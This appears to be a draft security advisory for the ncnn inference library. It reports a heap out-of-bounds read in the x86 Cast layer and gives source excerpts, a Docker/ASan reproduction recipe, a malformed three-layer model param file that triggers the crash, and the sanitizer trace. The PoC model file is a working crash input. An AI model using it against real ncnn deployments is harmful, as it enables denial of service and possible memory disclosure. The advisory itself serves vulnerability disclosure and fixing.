All advisories
Draft

Heap Out-of-Bounds Read in x86 Cast Conversion

Tencent/ncnn

Affected packages

ncnn other
Affected versions= 5e66f094bf7c597b4569cc014a8be84104748678
Patched versionsNot specified

Description

Heap Out-of-Bounds Read in x86 Cast Conversion

Affected commit: 5e66f094bf7c597b4569cc014a8be84104748678
Sink: src/layer/x86/cast_fp16.h:42 in cast_fp32_to_fp16_sse
Sanitizer verdict: unknown-crash

Summary

Cast_x86::forward picks its conversion routine from the layer's declared type_from but sizes the output from type_to, and never checks either against the incoming tensor's actual elemsize. Two chained Cast layers that both claim fp32-to-fp16 therefore hand an fp16-sized buffer to the fp32 reader, which issues 64-byte AVX-512 loads over a buffer holding half as many bytes and crashes ncnnoptimize. The entry point is ncnnoptimize <param> <bin> ... through ModelWriter::shape_inference().

Detail

Cast stores type_from and type_to straight from the parameter file. Cast_x86::forward uses type_to to compute out_elemsize and allocate the destination, then dispatches on the pair (type_from, type_to) — it reads bottom_blob.elemsize only to seed out_elemsize for the pass-through cases, never to verify that the source really holds type_from data.

// src/layer/x86/cast_x86.cpp:54
    else if (type_to == 2)
    {
        // float16
        out_elemsize = 2 * elempack;
    }

// src/layer/x86/cast_x86.cpp:77
        top_blob.create(w, h, d, channels, out_elemsize, elempack, batch, opt.blob_allocator);

// src/layer/x86/cast_x86.cpp:81
    int size = w * h * d * elempack;

    if (type_from == 1 && type_to == 2)
    {
        cast_fp32_to_fp16_sse(bottom_blob, top_blob, opt);
    }

// src/layer/x86/cast_fp16.h:40
        for (; i + 15 < size; i += 16)
        {
            __m512 _v_fp32 = _mm512_loadu_ps(ptr);

The PoC's Input data 0=20 1=20 2=1 11=1 produces a 20x20x1x1 fp32 tensor. cast1 (0=1 1=2) converts it correctly and, because type_to == 2, allocates its output at out_elemsize = 2: 400 elements x 2 bytes = 800 payload bytes, the 868-byte region ASan names. cast2 then declares 0=1 1=2 again, so type_from == 1 even though its input x is the fp16 buffer just produced.

cast_fp32_to_fp16_sse computes size = w * h * d * elempack = 400 and treats ptr as const float*, so it walks 1600 bytes across an 800-byte source. The AVX-512 loop reaches ptr + 832 while the allocation ends at 868, and the 64-byte _mm512_loadu_ps straddles the boundary — the partially-poisoned access ASan classifies as unknown-crash. A single comparison of bottom_blob.elemsize / elempack against the size implied by type_from would reject the graph.

Reproduce

Build and run (writes the Dockerfile, builds ncnn with ASan, runs the PoC)
mkdir -p ncnn-poc-heap-out-of-bounds-read-in-x86-cast-conversion && cd ncnn-poc-heap-out-of-bounds-read-in-x86-cast-conversion

cat > Dockerfile <<'DOCKERFILE'
FROM ubuntu:24.04

RUN apt-get update && apt-get install -y --no-install-recommends \
      git ca-certificates g++ cmake make python3 python3-pip python3-numpy \
      protobuf-compiler libprotobuf-dev \
 && pip3 install --no-cache-dir --break-system-packages onnx protobuf \
 && rm -rf /var/lib/apt/lists/*

RUN git clone --depth 1 https://github.com/Tencent/ncnn.git /ncnn

WORKDIR /ncnn
RUN cmake -S . -B build \
      -DCMAKE_BUILD_TYPE=Debug \
      -DCMAKE_C_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_CXX_FLAGS="-O0 -g -fsanitize=address" \
      -DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address" \
      -DNCNN_BUILD_TOOLS=ON -DNCNN_BUILD_EXAMPLES=ON -DNCNN_BUILD_BENCHMARK=ON \
      -DNCNN_BUILD_TESTS=OFF -DNCNN_VULKAN=OFF -DNCNN_OPENMP=OFF \
 && cmake --build build -j"$(nproc)"

ENV ASAN_OPTIONS=detect_leaks=0
WORKDIR /poc
DOCKERFILE

cat > poc.param <<'EOF'
7767517
3 3
Input data 0 1 data 0=20 1=20
Cast cast1 1 1 data x 0=1 1=2
Cast cast2 1 1 x y 0=1 1=2
EOF

docker build -t ncnn-asan .
docker run --rm --network none -v "$PWD:/poc" ncnn-asan \
  /ncnn/build/tools/ncnnoptimize poc.param null out.param out.bin 0

AddressSanitizer output:

==1==ERROR: AddressSanitizer: unknown-crash on address 0x5190000012c0 at pc 0x61ffb624cd16 bp 0x7fff5c0ddcb0 sp 0x7fff5c0ddca0
READ of size 64 at 0x5190000012c0 thread T0
    #0 0x61ffb624cd15 in _mm512_loadu_ps(void const*) /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342
    #1 0x61ffb624cd15 in cast_fp32_to_fp16_sse /ncnn/src/layer/x86/cast_fp16.h:42
    #2 0x61ffb625b096 in ncnn::Cast_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/cast_x86_avx512.cpp:85
    #3 0x61ffb01f4f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #4 0x61ffb01e6b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #5 0x61ffb02469e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #6 0x61ffb00d83c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #7 0x61ffb0155eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #8 0x776377bef1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #9 0x776377bef28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #10 0x61ffb00d5624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

0x5190000012e4 is located 0 bytes after 868-byte region [0x519000000f80,0x5190000012e4)
allocated by thread T0 here:
    #0 0x776378268f1d in posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x61ffb016a68e in fastMalloc /ncnn/src/allocator.h:62
    #2 0x61ffb016a68e in ncnn::PoolAllocator::fastMalloc(unsigned long) /ncnn/src/allocator.cpp:159
    #3 0x61ffb01a94b8 in ncnn::Mat::create(int, int, unsigned long, int, ncnn::Allocator*) /ncnn/src/mat.cpp:539
    #4 0x61ffb01acf5b in ncnn::Mat::create(int, int, unsigned long, int, int, ncnn::Allocator*) /ncnn/src/mat.cpp:716
    #5 0x61ffb625adc3 in ncnn::Cast_x86_avx512::forward(ncnn::Mat const&, ncnn::Mat&, ncnn::Option const&) const /ncnn/build/src/layer/x86/cast_x86_avx512.cpp:73
    #6 0x61ffb01f4f2b in ncnn::NetPrivate::do_forward_layer(ncnn::Layer const*, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:721
    #7 0x61ffb01e6b7f in ncnn::NetPrivate::forward_layer(int, std::vector<ncnn::Mat, std::allocator<ncnn::Mat> >&, ncnn::Option const&) const /ncnn/src/net.cpp:167
    #8 0x61ffb02469e9 in ncnn::Extractor::extract(int, ncnn::Mat&, int) /ncnn/src/net.cpp:2939
    #9 0x61ffb00d83c0 in ModelWriter::shape_inference() /ncnn/tools/modelwriter.h:435
    #10 0x61ffb0155eee in main /ncnn/tools/ncnnoptimize.cpp:2844
    #11 0x776377bef1c9  (/lib/x86_64-linux-gnu/libc.so.6+0x2a1c9) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #12 0x776377bef28a in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2a28a) (BuildId: 328820b908de8ea1ef79afa8995e302e819163d7)
    #13 0x61ffb00d5624 in _start (/ncnn/build/tools/ncnnoptimize+0x2a1624) (BuildId: b1911b1bfb480c5a294bfb9d0e0f7bbde3aaf530)

SUMMARY: AddressSanitizer: unknown-crash /usr/lib/gcc/x86_64-linux-gnu/13/include/avx512fintrin.h:6342 in _mm512_loadu_ps(void const*)

Credit

Zheng Yu @ DepthFirst